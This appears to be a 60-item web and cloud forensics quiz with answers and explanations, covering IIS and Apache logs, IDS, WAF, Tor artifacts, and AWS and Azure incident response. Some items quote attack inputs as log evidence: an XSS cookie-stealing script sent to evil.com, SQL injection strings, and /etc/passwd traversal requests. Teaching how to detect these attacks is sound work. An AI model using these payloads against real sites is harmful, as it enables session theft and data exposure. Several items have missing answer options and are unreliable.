1What is the primary goal of web application forensics?
Understand web application forensics
Easy
A.Investigating attacks and tracing the source of web application incidents
B.Improving website loading speed for users
C.Writing marketing content for web pages
D.Designing new user interfaces for websites
Correct Answer: Investigating attacks and tracing the source of web application incidents
Explanation:
Web application forensics focuses on analyzing evidence to investigate attacks and identify the source of incidents affecting web applications.
Incorrect! Try again.
2IIS logs are generated by web servers running on which operating system?
Understand Internet Information Services (IIS) logs
Easy
A.Linux
B.macOS
C.Windows
D.Android
Correct Answer: Windows
Explanation:
Internet Information Services (IIS) is Microsoft's web server, and it runs on the Windows operating system.
Incorrect! Try again.
3What is the default log file format used by modern IIS servers?
Understand Internet Information Services (IIS) logs
Easy
A.W3C Extended Log File Format
B.CSV Comma Format
C.XML Trace Format
D.JSON Log Format
Correct Answer: W3C Extended Log File Format
Explanation:
IIS uses the W3C Extended Log File Format by default, which records customizable fields for each request.
Incorrect! Try again.
4Which Apache log file records details of every request made to the web server?
Understand Apache web server logs
Easy
A.Boot log
B.Firewall log
C.Access log
D.Kernel log
Correct Answer: Access log
Explanation:
The Apache access log stores information about every request processed by the server, such as client IP, request time, and requested resource.
Incorrect! Try again.
5Which Apache log file is used to record diagnostic information and processing errors?
Understand Apache web server logs
Easy
A.Agent log
B.Error log
C.Referer log
D.Access log
Correct Answer: Error log
Explanation:
The Apache error log captures diagnostic messages and errors encountered while the server processes requests.
Incorrect! Try again.
6What is the main function of an Intrusion Detection System (IDS)?
Understand the functionality of intrusion detection system (IDS)
Easy
A.Store backups of website databases
B.Encrypt all outgoing email messages
C.Increase internet bandwidth for users
D.Monitor network traffic and alert on suspicious activity
Correct Answer: Monitor network traffic and alert on suspicious activity
Explanation:
An IDS monitors network or system activity for malicious behavior and generates alerts when suspicious activity is detected.
Incorrect! Try again.
7Which type of IDS detection relies on known attack patterns to identify threats?
Understand the functionality of intrusion detection system (IDS)
Easy
A.Signature-based detection
B.Bandwidth-based detection
C.Password-based detection
D.Location-based detection
Correct Answer: Signature-based detection
Explanation:
Signature-based detection compares observed activity against a database of known attack signatures to identify threats.
Incorrect! Try again.
8A Web Application Firewall (WAF) primarily protects against attacks at which layer?
Understand the functionality of web application firewall (WAF)
Easy
A.Physical layer
B.Transport layer only
C.Application layer
D.Data link layer
Correct Answer: Application layer
Explanation:
A WAF filters and monitors HTTP traffic to protect web applications at the application layer from attacks like SQL injection and XSS.
Incorrect! Try again.
9Which of the following attacks is a WAF specifically designed to help block?
Understand the functionality of web application firewall (WAF)
Easy
A.SQL injection
B.Hardware overheating
C.Physical theft of servers
D.Power supply failure
Correct Answer: SQL injection
Explanation:
A WAF inspects incoming requests and blocks common web attacks such as SQL injection, cross-site scripting, and other application-layer threats.
Incorrect! Try again.
10When investigating web attacks on a Windows-based server, which log source is most useful?
Investigate web attacks on windows-based servers
Easy
A.IIS logs
B.Cron job logs
C.Apache access logs
D.Systemd journal
Correct Answer: IIS logs
Explanation:
Windows-based web servers typically run IIS, so IIS logs are a key source of evidence when investigating web attacks.
Incorrect! Try again.
11Which attack involves injecting malicious scripts into web pages viewed by other users?
Detect and investigate various attacks on web applications
Easy
A.Denial of storage
B.Cable tapping
C.Cross-Site Scripting (XSS)
D.Cold boot attack
Correct Answer: Cross-Site Scripting (XSS)
Explanation:
Cross-Site Scripting (XSS) injects malicious scripts into trusted web pages, which then execute in other users' browsers.
Incorrect! Try again.
12A SQL injection attack primarily targets which component of a web application?
Detect and investigate various attacks on web applications
Easy
A.Keyboard
B.Monitor
C.Database
D.Printer
Correct Answer: Database
Explanation:
SQL injection exploits improperly validated input to run malicious SQL queries against the application's backend database.
Incorrect! Try again.
13What best describes the dark web?
Understand the dark web
Easy
A.The most visited social media platforms
B.A backup copy of the public internet
C.Websites indexed by common search engines
D.Hidden part of the internet accessible only through special software
Correct Answer: Hidden part of the internet accessible only through special software
Explanation:
The dark web is a portion of the internet that is intentionally hidden and requires special software such as Tor to access.
Incorrect! Try again.
14Which software is most commonly used to access the dark web anonymously?
Understand the dark web
Easy
A.Windows Explorer
B.Tor browser
C.Microsoft Word
D.Adobe Reader
Correct Answer: Tor browser
Explanation:
The Tor browser routes traffic through multiple relays to provide anonymity and is commonly used to access dark web sites.
Incorrect! Try again.
15During an investigation, the presence of which file or folder can indicate the use of the Tor browser?
Determine how to identify the traces of tor browser during investigation
Easy
A.System32 folder
B.Recycle Bin folder
C.Downloads folder only
D.Tor Browser installation folder
Correct Answer: Tor Browser installation folder
Explanation:
The presence of a Tor Browser installation folder or its files on a system is a strong indicator that Tor was used.
Incorrect! Try again.
16What does the Tor network use to provide anonymity to its users?
Perform Tor browser forensics
Easy
A.A single direct connection to the server
B.Physical mail routing
C.Multiple relay nodes with layered encryption
D.Plain text transmission only
Correct Answer: Multiple relay nodes with layered encryption
Explanation:
Tor routes traffic through multiple relay nodes and uses layered (onion) encryption to hide the user's identity and location.
Incorrect! Try again.
17Which cloud service model provides virtualized computing resources such as servers and storage over the internet?
Understand the basic cloud computing concepts
Easy
A.Antivirus as a Service
B.Cable as a Service
C.Infrastructure as a Service (IaaS)
D.Hardware as a Product
Correct Answer: Infrastructure as a Service (IaaS)
Explanation:
IaaS delivers fundamental computing resources like virtual servers, storage, and networking over the internet.
Incorrect! Try again.
18What is a key challenge in cloud forensics compared to traditional forensics?
Understand cloud forensics
Easy
A.Cloud data is always physically local
B.Data may be distributed across multiple locations and jurisdictions
C.Cloud systems never generate logs
D.There is no data stored in the cloud
Correct Answer: Data may be distributed across multiple locations and jurisdictions
Explanation:
In cloud environments, data is often spread across multiple data centers and jurisdictions, complicating evidence collection.
Incorrect! Try again.
19Which AWS service provides scalable object storage?
Understand the fundamentals of Amazon Web Services (AWS)
Easy
A.Amazon Word
B.Amazon Cron
C.Amazon Kernel
D.Amazon S3
Correct Answer: Amazon S3
Explanation:
Amazon Simple Storage Service (S3) provides scalable object storage for storing and retrieving data in the cloud.
Incorrect! Try again.
20Which AWS service records API calls and is useful for investigating security incidents?
Determine how to investigate security incidents in AWS
Easy
A.AWS CloudTrail
B.AWS Notepad
C.AWS Speaker
D.AWS Wallpaper
Correct Answer: AWS CloudTrail
Explanation:
AWS CloudTrail logs API activity across an AWS account, providing an audit trail valuable for incident investigation.
Incorrect! Try again.
21During an investigation, an analyst finds an IIS log entry with sc-status 200 and sc-substatus 0. What does this combination indicate about the request?
Understand Internet Information Services (IIS) logs
Medium
A.The request was blocked by an authentication filter because the client repeatedly supplied invalid credentials over multiple sessions
B.The request was successfully processed by the server
C.The request was redirected to another resource
D.The request failed due to a server-side error
Correct Answer: The request was successfully processed by the server
Explanation:
In IIS logs, sc-status 200 denotes success and sc-substatus 0 means there was no additional sub-status error, so the request completed successfully.
Incorrect! Try again.
22An Apache access.log line ends with "GET /admin.php?id=1' OR '1'='1 HTTP/1.1" 200 512. Which attack does this most likely represent?
Understand Apache web server logs
Medium
A.Denial of service
B.SQL injection
C.Cross-site scripting
D.Directory traversal
Correct Answer: SQL injection
Explanation:
The payload ' OR '1'='1 is a classic SQL injection tautology used to manipulate a backend query, and the 200 status suggests the request was processed.
Incorrect! Try again.
23While performing web application forensics, why is it important to preserve the server's system time and timezone configuration?
Understand web application forensics
Medium
A.To correctly correlate log timestamps across multiple sources during timeline reconstruction
B.To automatically translate log entries into the investigator's local language
C.To improve the performance of the web server
D.To reduce the size of the collected log files
Correct Answer: To correctly correlate log timestamps across multiple sources during timeline reconstruction
Explanation:
Accurate time and timezone data are essential to align events from different logs and build a reliable timeline of the attack.
Incorrect! Try again.
24A signature-based IDS fails to detect a newly released zero-day exploit. What is the primary reason for this limitation?
Understand the functionality of intrusion detection system (IDS)
Medium
A.The exploit used encrypted HTTPS traffic that the IDS decrypted
B.No matching signature exists in its database for the new exploit
C.The IDS was configured in inline blocking mode
D.The IDS relies solely on behavioral anomaly baselines built over time from network traffic
Correct Answer: No matching signature exists in its database for the new exploit
Explanation:
Signature-based IDS detects only known patterns; a zero-day has no existing signature, so it goes undetected until a signature is added.
Incorrect! Try again.
25A WAF operating in a positive security model would handle incoming requests by:
Understand the functionality of web application firewall (WAF)
Medium
A.Allowing only requests that match a defined whitelist of acceptable behavior
B.Logging all traffic without taking any blocking action
C.Forwarding all requests to an IDS for secondary inspection before allowing them to reach the application
D.Blocking only requests matching known attack signatures
Correct Answer: Allowing only requests that match a defined whitelist of acceptable behavior
Explanation:
A positive (whitelist) security model permits only explicitly allowed inputs and rejects everything else, unlike a negative model that blocks known bad patterns.
Incorrect! Try again.
26On a Windows-based web server, which log source is most useful for correlating a suspicious IIS request with a subsequent failed administrative login?
Investigate web attacks on windows-based servers
Medium
A.Windows Registry hives
B.The IIS applicationHost.config file
C.Windows Security Event Log
D.The prefetch folder
Correct Answer: Windows Security Event Log
Explanation:
The Security Event Log records logon events (e.g., Event ID 4625 for failed logons), allowing investigators to correlate web activity with authentication attempts.
Incorrect! Try again.
27An analyst observes a request containing <script>document.location='http://evil.com/c?'+document.cookie</script>. Which attack is being attempted?
Detect and investigate various attacks on web applications
Medium
A.SQL injection
B.Cross-site scripting (XSS)
C.Command injection
D.Session fixation
Correct Answer: Cross-site scripting (XSS)
Explanation:
The injected <script> that reads document.cookie and sends it to an attacker domain is a classic cross-site scripting payload aimed at stealing session cookies.
Incorrect! Try again.
28A web log shows repeated requests such as GET /../../../../etc/passwd. This is characteristic of which attack?
Detect and investigate various attacks on web applications
Medium
A.Directory (path) traversal
B.Buffer overflow
C.Clickjacking
D.Cross-site request forgery
Correct Answer: Directory (path) traversal
Explanation:
The ../ sequences attempt to escape the web root and access files like /etc/passwd, which is the signature of a directory traversal attack.
Incorrect! Try again.
29Which statement best describes how content is typically accessed on the dark web?
Understand the dark web
Medium
A.Through anonymizing overlay networks such as Tor using special addresses
B.Through standard search engines like Google with normal URLs
C.Through cloud provider consoles that require multi-factor authentication and signed API requests
D.Only via a physical direct connection to hosting servers
Correct Answer: Through anonymizing overlay networks such as Tor using special addresses
Explanation:
Dark web content is reached through anonymizing overlay networks like Tor, using .onion addresses that are not indexed by conventional search engines.
Incorrect! Try again.
30Which artifact is a strong indicator that the Tor Browser was installed on a Windows system?
Determine how to identify the traces of tor browser during investigation
Medium
A.The default Internet Explorer history database
B.Presence of the Tor Browser folder and tor.exe executable
C.A large number of entries in the DNS resolver cache
D.Multiple restore points created by System Protection over several months
Correct Answer: Presence of the Tor Browser folder and tor.exe executable
Explanation:
Tor Browser is portable and typically leaves its installation folder containing tor.exe and Firefox-based files, a clear sign of its presence.
Incorrect! Try again.
31Why is memory (RAM) analysis particularly valuable when performing Tor Browser forensics?
Perform Tor browser forensics
Medium
A.Memory always contains the plaintext private keys of every Tor relay used in the circuit path
B.RAM contains the only copy of the Tor network's routing tables
C.The Tor Browser stores all its history permanently in an encrypted disk file
D.Visited .onion URLs and browsing artifacts may reside in memory even though they are not saved to disk
Correct Answer: Visited .onion URLs and browsing artifacts may reside in memory even though they are not saved to disk
Explanation:
Tor Browser is designed to minimize disk artifacts, so volatile memory often holds URLs, page fragments, and other evidence that would otherwise be lost.
Incorrect! Try again.
32In the shared responsibility model, which task is typically the customer's responsibility in an IaaS deployment?
Understand the basic cloud computing concepts
Medium
A.Ensuring the redundancy of the underlying network hardware fabric
B.Maintaining the physical security of the data center
C.Managing the hypervisor software
D.Securing the guest operating system and applications they install
Correct Answer: Securing the guest operating system and applications they install
Explanation:
Under IaaS, the provider secures the physical and virtualization layers, while the customer is responsible for the guest OS, applications, and their data.
Incorrect! Try again.
33What is one of the biggest challenges unique to cloud forensics compared to traditional forensics?
Understand cloud forensics
Medium
A.The inability to ever collect volatile memory from any system
B.The complete absence of any logging capabilities in the cloud
C.Limited physical access to hardware and multi-tenant data commingling
D.The requirement that all evidence be printed on paper before it can be admitted
Correct Answer: Limited physical access to hardware and multi-tenant data commingling
Explanation:
Investigators rarely have physical access to cloud hardware, and multiple tenants sharing resources complicates isolating and acquiring relevant evidence.
Incorrect! Try again.
34Which AWS service provides object storage where data is stored in buckets?
Understand the fundamentals of Amazon Web Services (AWS)
Medium
A.Amazon VPC
B.Amazon S3
C.Amazon EC2
D.Amazon RDS
Correct Answer: Amazon S3
Explanation:
Amazon Simple Storage Service (S3) stores data as objects within containers called buckets; EC2 is compute, RDS is databases, and VPC is networking.
Incorrect! Try again.
35An investigator needs a record of all API calls made within an AWS account, including who made the call and when. Which service should they examine?
Determine how to investigate security incidents in AWS
Medium
A.AWS CloudTrail
B.AWS Trusted Advisor
C.Amazon Route 53
D.Amazon CloudWatch Metrics
Correct Answer: AWS CloudTrail
Explanation:
CloudTrail logs API activity across the account, capturing the identity, time, source IP, and parameters of each call, making it central to AWS incident investigation.
Incorrect! Try again.
36To capture the volatile state of a compromised EC2 instance for forensic analysis, which action best preserves evidence?
Determine how to investigate security incidents in AWS
Medium
A.Immediately terminate the instance to stop the attacker
B.Change the instance security group and continue normal operations without imaging anything
C.Create a snapshot of the EBS volume and acquire a memory image before termination
D.Reboot the instance to clear any malicious processes
Correct Answer: Create a snapshot of the EBS volume and acquire a memory image before termination
Explanation:
Snapshotting the EBS volume preserves disk data and capturing memory preserves volatile evidence; terminating or rebooting would destroy volatile data.
Incorrect! Try again.
37In Microsoft Azure, which service is used to centrally manage identities and control access to resources?
Understand the fundamentals of Microsoft Azure
Medium
A.Azure Virtual Network
B.Azure Blob Storage
C.Azure Load Balancer
D.Microsoft Entra ID (Azure Active Directory)
Correct Answer: Microsoft Entra ID (Azure Active Directory)
Explanation:
Microsoft Entra ID (formerly Azure Active Directory) provides identity and access management for Azure resources and applications.
Incorrect! Try again.
38Which Azure log source records control-plane operations such as creating or deleting resources within a subscription?
Determine how to investigate security incidents in Azure
Medium
A.Azure Activity Log
B.Azure Boot Diagnostics
C.Azure Application Insights traces
D.Azure Advisor recommendations
Correct Answer: Azure Activity Log
Explanation:
The Azure Activity Log captures subscription-level control-plane events (who did what, when) such as resource creation, modification, and deletion.
Incorrect! Try again.
39An investigator wants to review sign-in attempts and identity-related risk events in Azure. Which logs should they primarily analyze?
Determine how to investigate security incidents in Azure
Medium
A.Azure Network Watcher packet captures
B.Microsoft Entra ID sign-in and audit logs
C.Azure Cost Management reports
D.Azure Resource Health status logs
Correct Answer: Microsoft Entra ID sign-in and audit logs
Explanation:
Entra ID sign-in logs record authentication events and risk detections, while audit logs record directory changes, both key for identity incident analysis.
Incorrect! Try again.
40Why is acquiring forensic evidence from containers challenging compared to traditional virtual machines?
Understand forensic methodologies for containers and microservices
Medium
A.Containers cannot generate any log output at all
B.Containers are ephemeral and may be destroyed and recreated, losing state quickly
C.Containers always run on dedicated physical servers isolated from any orchestration platform
D.Containers permanently store all runtime data on external tape backups
Correct Answer: Containers are ephemeral and may be destroyed and recreated, losing state quickly
Explanation:
Containers are short-lived and often recreated by orchestrators, so volatile evidence can disappear rapidly, requiring rapid capture of runtime state, images, and logs.
Incorrect! Try again.
41An investigator analyzing IIS W3C logs notices that the sc-status field shows 200 while the sc-substatus shows 0, but the cs-uri-stem contains /admin/config.php on a server that runs only ASP.NET. Which conclusion is most defensible?
Understand Internet Information Services (IIS) logs
Hard
A.IIS automatically blocks .php files, so sc-status 200 indicates a false log entry
B.The request was logged as successful but likely served a static/handler-mapped response, warranting review of handler mappings and possible file upload
C.The sc-substatus 0 proves the request was rejected before reaching the application layer
D.The request succeeded and returned the resource, so the PHP file was executed by IIS
Correct Answer: The request was logged as successful but likely served a static/handler-mapped response, warranting review of handler mappings and possible file upload
Explanation:
A 200/0 means IIS returned success, but an ASP.NET-only server serving /admin/config.php is anomalous. This suggests either a static file handler served the file or an attacker uploaded it. It does not prove PHP execution, and sc-substatus 0 simply denotes no substatus, not rejection.
Incorrect! Try again.
42In an Apache combined log, an investigator sees repeated entries: GET /index.php?id=1%27%20UNION%20SELECT%20... returning status 200 with a large bytes value that differs across requests. What is the strongest interpretation?
Understand Apache web server logs
Hard
A.The 200 status guarantees the queries failed silently at the database
B.The WAF blocked the requests, hence the varying byte counts
C.URL-encoded quotes always indicate a benign search operation
D.A successful UNION-based SQL injection is likely exfiltrating differing data per request
Correct Answer: A successful UNION-based SQL injection is likely exfiltrating differing data per request
Explanation:
The %27 (single quote) plus UNION SELECT payload with 200 responses and varying response sizes strongly indicates successful data extraction, since different injected queries return differently sized result sets. A block would typically yield 403, not 200.
Incorrect! Try again.
43A network IDS using signature-based detection fails to flag a novel polymorphic web shell, while an anomaly-based IDS raises an alert. Which statement best explains the difference and its forensic implication?
Understand the functionality of intrusion detection system (IDS)
Hard
A.Anomaly IDS detected deviation from baseline behavior; its alert may have higher false-positive risk but caught the unknown threat
B.Anomaly IDS relies solely on known signatures, explaining the earlier miss
C.Both systems must be misconfigured since polymorphic code is undetectable by design
D.Signature IDS is superior because it never generates false positives during investigation
Correct Answer: Anomaly IDS detected deviation from baseline behavior; its alert may have higher false-positive risk but caught the unknown threat
Explanation:
Signature-based IDS cannot match unknown/polymorphic patterns lacking a signature. Anomaly-based IDS detects statistical deviations from a learned baseline, enabling zero-day detection at the cost of more false positives, which the investigator must corroborate.
Incorrect! Try again.
44During an investigation, logs show a WAF operating in 'detection-only' (monitoring) mode logged an XSS attempt but the payload still reached the application. Which is the correct forensic conclusion?
Understand the functionality of web application firewall (WAF)
Hard
A.The WAF signature database was corrupted, allowing all traffic through
B.Detection mode encrypts payloads, so the logged attack cannot be trusted
C.In monitoring mode the WAF logs but does not block, so the request reaching the app is expected behavior
D.The WAF was bypassed via encoding, since detection mode always blocks confirmed attacks
Correct Answer: In monitoring mode the WAF logs but does not block, so the request reaching the app is expected behavior
Explanation:
A WAF in detection/monitoring mode records events without enforcing blocks. Therefore the payload reaching the application is the intended behavior of that mode, not a bypass or corruption. This is critical when assessing whether the WAF actually prevented an attack.
Incorrect! Try again.
45On a compromised Windows/IIS server, an investigator finds a new scheduled task created shortly after suspicious IIS log entries and a corresponding 4698 event in the Security log. What does correlating these artifacts most strongly indicate?
Investigate web attacks on windows-based servers
Hard
A.The scheduled task caused the IIS entries by generating web traffic
B.Establishment of persistence following the web exploitation, linking the web vector to host-level compromise
C.Event 4698 proves the attacker had physical console access
D.Routine Windows Update installed the task automatically
Correct Answer: Establishment of persistence following the web exploitation, linking the web vector to host-level compromise
Explanation:
Event ID 4698 logs scheduled task creation. Its timing after malicious IIS activity indicates the attacker gained execution via the web app and then created a task for persistence, connecting the web attack to host compromise. It does not imply physical access.
Incorrect! Try again.
46An investigator observes a request GET /profile?file=....//....//....//etc/passwd that succeeded. What attack and evasion technique are demonstrated?
Detect and investigate various attacks on web applications
Hard
A.Path/directory traversal using nested-sequence obfuscation to bypass naive ../ filtering
Correct Answer: Path/directory traversal using nested-sequence obfuscation to bypass naive ../ filtering
Explanation:
The ....// pattern collapses to ../ after a filter naively strips a single ../, enabling directory traversal to read /etc/passwd. This is a classic filter-evasion technique for path traversal, not SQLi, CSRF, or SSRF.
Incorrect! Try again.
47While reconstructing a multi-stage web attack, an investigator must establish the sequence of events across the reverse proxy, WAF, and application server, each in a different timezone. What is the most critical first step?
Understand web application forensics
Hard
A.Normalize all timestamps to a single reference (e.g., UTC) to build an accurate timeline
B.Convert all logs to PDF to preserve them as evidence
C.Delete duplicate log entries to reduce noise before correlation
D.Trust the application server clock as authoritative and ignore the others
Correct Answer: Normalize all timestamps to a single reference (e.g., UTC) to build an accurate timeline
Explanation:
Cross-source correlation requires consistent time. Normalizing all timestamps to UTC (accounting for skew) is essential before reconstructing event order. Deleting entries or blindly trusting one clock would corrupt the timeline.
Incorrect! Try again.
48An investigator encounters a .onion v3 address that is 56 characters long. Compared to legacy v2 addresses, what does the v3 format primarily improve, and why does length matter forensically?
Understand the dark web
Hard
A.It embeds the operator's IP in the address for easier tracing
B.It uses stronger elliptic-curve cryptography with longer public-key-derived addresses, resisting deanonymization and enumeration
C.It uses shorter hashes for faster indexing by search engines
D.It removes encryption to comply with legal intercept requirements
Correct Answer: It uses stronger elliptic-curve cryptography with longer public-key-derived addresses, resisting deanonymization and enumeration
Explanation:
Onion v3 (56 chars) is derived from an ed25519 public key, offering stronger crypto than v2's 16-char RSA-based addresses. The longer, key-based address resists harvesting/enumeration and impersonation, complicating investigative attempts to correlate services.
Incorrect! Try again.
49On a suspect's Windows machine with no Tor Browser present, an investigator wants to determine if it was ever run. Which artifact combination is most reliable?
Determine how to identify the traces of tor browser during investigation
Hard
A.The default browser setting in Internet Options
B.Prefetch files, registry MUICache/UserAssist, and $MFT/USN journal remnants referencing tor.exe or firefox.exe from the bundle
C.Only the current contents of C:\Program Files
D.The live network connections shown by netstat
Correct Answer: Prefetch files, registry MUICache/UserAssist, and $MFT/USN journal remnants referencing tor.exe or firefox.exe from the bundle
Explanation:
Even after deletion, execution artifacts persist: Prefetch records program runs, UserAssist/MUICache log GUI execution, and $MFT/USN journal retain filename remnants. These provide evidence of past Tor usage. Live netstat only shows current state.
Incorrect! Try again.
50During Tor Browser forensics, an investigator finds the browser was closed normally, yet recovers browsing remnants from a memory dump taken while it was running. Why is memory analysis often the most productive approach?
Perform Tor browser forensics
Hard
A.Tor Browser is designed to leave minimal disk artifacts, so decrypted URLs, keys, and page content reside primarily in volatile memory during execution
B.Memory dumps are legally required before any disk imaging
C.Tor Browser writes all history to disk in plaintext by default
D.The disk cache retains full session data for 30 days
Correct Answer: Tor Browser is designed to leave minimal disk artifacts, so decrypted URLs, keys, and page content reside primarily in volatile memory during execution
Explanation:
Tor Browser intentionally avoids persisting history/cache to disk. Consequently, decrypted content, visited onion addresses, and session data are found mainly in RAM while running, making live memory acquisition the richest source of evidence.
Incorrect! Try again.
51In a PaaS deployment, a data breach occurs due to a vulnerability in the customer's application code. Under the shared responsibility model, who is primarily accountable, and why?
Understand the basic cloud computing concepts
Hard
A.Both share equal legal liability regardless of the vulnerability's location
B.The customer, because in PaaS the customer is responsible for their own application and data despite the provider managing the platform
C.Neither, since PaaS eliminates all customer security duties
D.The cloud provider, because they own the underlying runtime and OS
Correct Answer: The customer, because in PaaS the customer is responsible for their own application and data despite the provider managing the platform
Explanation:
In PaaS, the provider secures the OS, runtime, and platform, while the customer remains responsible for their application code and data. A flaw in customer-written code falls squarely within the customer's responsibility.
Incorrect! Try again.
52A forensic examiner needs to acquire a running EC2 instance's volatile data but cannot install tools due to chain-of-custody concerns about altering the system. Which approach best balances evidentiary integrity with data capture?
Understand cloud forensics
Hard
A.Reboot the instance to flush data into persistent logs
B.Take an EBS snapshot and, where supported, capture memory via the hypervisor/provider mechanism to minimize footprint on the guest
C.Delete the instance and restore from backup for analysis
D.Change the security group rules to isolate then format the volume
Correct Answer: Take an EBS snapshot and, where supported, capture memory via the hypervisor/provider mechanism to minimize footprint on the guest
Explanation:
Snapshotting the EBS volume preserves disk state, and provider/hypervisor-level memory capture avoids modifying the guest. Rebooting destroys volatile data, and deleting/formatting destroys evidence—both violate forensic soundness.
Incorrect! Try again.
53An investigator wants a complete record of API calls (who, what, when) made against AWS resources during an incident. Which service is the authoritative source, and what is a key limitation to verify?
Understand the fundamentals of Amazon Web Services (AWS)
Hard
A.Amazon CloudWatch metrics; verify the retention period is unlimited by default
B.AWS Config; verify it captures raw network packets
C.Amazon Inspector; verify it records user login passwords
D.AWS CloudTrail; verify it was enabled in all regions and logs were not tampered with (e.g., log file validation)
Correct Answer: AWS CloudTrail; verify it was enabled in all regions and logs were not tampered with (e.g., log file validation)
Explanation:
CloudTrail records account API activity (identity, action, time, source). Investigators must confirm multi-region/organization coverage and use log file integrity validation to detect tampering. CloudWatch handles metrics/logs, not the API audit trail authoritatively.
Incorrect! Try again.
54During an AWS incident, CloudTrail shows AssumeRole events from an unfamiliar external account ID immediately before sensitive S3 GetObject calls. What does this pattern most likely indicate?
Determine how to investigate security incidents in AWS
Hard
A.S3 automatically assumes roles for encryption, which is expected
B.Normal cross-service AWS internal operation requiring no action
C.A DNS misconfiguration causing spurious log entries
D.Potential cross-account role abuse where an attacker leveraged a misconfigured trust policy to access S3 data
Correct Answer: Potential cross-account role abuse where an attacker leveraged a misconfigured trust policy to access S3 data
Explanation:
AssumeRole from an unknown external account followed by data access suggests exploitation of an overly permissive IAM trust policy, enabling cross-account privilege escalation. Investigators should review the role's trust relationship and revoke it.
Incorrect! Try again.
55An investigator must determine which identities authenticated and what conditional access decisions applied during an Azure AD (Entra ID) compromise. Which log source is authoritative?
Understand the fundamentals of Microsoft Azure
Hard
A.Azure AD Sign-in logs, which capture authentication events, MFA status, and conditional access outcomes
B.Azure Activity Log, which records control-plane resource operations only
C.Azure Network Watcher flow logs, which record sign-in credentials
D.Azure Monitor autoscale logs, which track user password changes
Correct Answer: Azure AD Sign-in logs, which capture authentication events, MFA status, and conditional access outcomes
Explanation:
Azure AD (Entra ID) Sign-in logs detail who signed in, from where, MFA results, and conditional access policy evaluations—critical for identity compromise investigations. Activity Log covers resource control-plane operations, not authentication detail.
Incorrect! Try again.
56In Azure, an investigator sees a VM was accessed and suspects the disk must be preserved without stopping ongoing analysis. What is the recommended evidence-preservation method for the managed disk?
Determine how to investigate security incidents in Azure
Hard
A.Resize the disk to force Azure to archive the original
B.Delete the VM to freeze its state permanently
C.Create a snapshot of the managed disk and copy it to an isolated, access-controlled storage account with a hash for integrity
D.Enable Azure Bastion to capture keystrokes retroactively
Correct Answer: Create a snapshot of the managed disk and copy it to an isolated, access-controlled storage account with a hash for integrity
Explanation:
Snapshotting the managed disk preserves its state; copying to an isolated storage account with restricted access and computing a hash maintains chain of custody and integrity. Deleting the VM destroys evidence.
Incorrect! Try again.
57An investigator must analyze a compromised container that has already been terminated in a Kubernetes cluster with ephemeral pods. What is the fundamental forensic challenge and best mitigation?
Understand forensic methodologies for containers and microservices
Hard
A.Kubernetes retains full container memory indefinitely, so no mitigation is needed
B.Containers store all forensic data on the node's BIOS; mitigate by dumping firmware
C.Containers cannot be investigated at all, so only the host OS matters
D.Ephemeral, immutable containers lose state on termination; mitigate with centralized logging, image registries, and runtime telemetry captured beforehand
Correct Answer: Ephemeral, immutable containers lose state on termination; mitigate with centralized logging, image registries, and runtime telemetry captured beforehand
Explanation:
Containers are ephemeral and immutable, so once terminated, in-container state is gone. Effective container forensics relies on pre-collected evidence: centralized logs, immutable image digests from registries, and runtime security telemetry (e.g., eBPF/Falco).
Incorrect! Try again.
58An IIS log shows many requests with sc-status 500 and sc-win32-status 64. How should an investigator interpret the sc-win32-status value in this forensic context?
Understand Internet Information Services (IIS) logs
Hard
A.It represents the number of bytes lost during the request
B.It is the HTTP status duplicated, so both fields mean server error
C.It is a Windows system error code (64 = 'The specified network name is no longer available'), giving OS-level context to the failure
Correct Answer: It is a Windows system error code (64 = 'The specified network name is no longer available'), giving OS-level context to the failure
Explanation:
The sc-win32-status field records the underlying Windows error code. Code 64 maps to 'The specified network name is no longer available,' providing OS-level diagnostic context beyond the HTTP 500, useful for root-cause analysis.
Incorrect! Try again.
59An investigator compares an Apache access_log and error_log. A request appears in access_log with status 404, but there is no corresponding error_log entry. What is the correct interpretation?
Understand Apache web server logs
Hard
A.Apache always logs 404 responses to error_log at LogLevel warn
B.A 404 is a normal HTTP response logged in access_log; error_log only records server-side errors/diagnostics per the LogLevel, so absence is expected
D.The 404 must be fabricated because every access entry has an error entry
Correct Answer: A 404 is a normal HTTP response logged in access_log; error_log only records server-side errors/diagnostics per the LogLevel, so absence is expected
Explanation:
access_log records all requests with their HTTP status, including 404. The error_log captures server diagnostics based on LogLevel and does not necessarily log client 404s. Their independent purposes mean a missing error entry is normal, not proof of tampering.
Incorrect! Try again.
60Web logs show a rapid burst of POST /login requests from many distinct IPs, each with a different username but a small recurring set of passwords, all returning 200. Which attack is indicated and what distinguishes it?
Detect and investigate various attacks on web applications
Hard
A.Brute force, distinguished by exhaustively trying all passwords on a single account
B.Credential stuffing, distinguished by reusing leaked credential pairs against one account
C.Session fixation, distinguished by reusing a fixed session token
D.Password spraying, distinguished by trying a few common passwords across many accounts to evade lockout thresholds
Correct Answer: Password spraying, distinguished by trying a few common passwords across many accounts to evade lockout thresholds
Explanation:
Password spraying uses a small set of common passwords tried across many different accounts (one attempt per account per round) to avoid triggering per-account lockouts. The distributed IPs and many usernames with few passwords match this signature, unlike single-account brute force.
Incorrect! Try again.
Did this save you a night before the exam?
LPU Notes is free, and it stays free. Ads cover part of the server bill.
The rest comes out of a student's own pocket: the domain, the storage,
and keeping the site up through the weeks everyone needs it at once.
The payment button didn't load. An ad blocker or a filtered network is the usual reason.
to try again.
Nothing here is ever locked, and nothing unlocks. Chip in only if it was worth it.
What it pays for →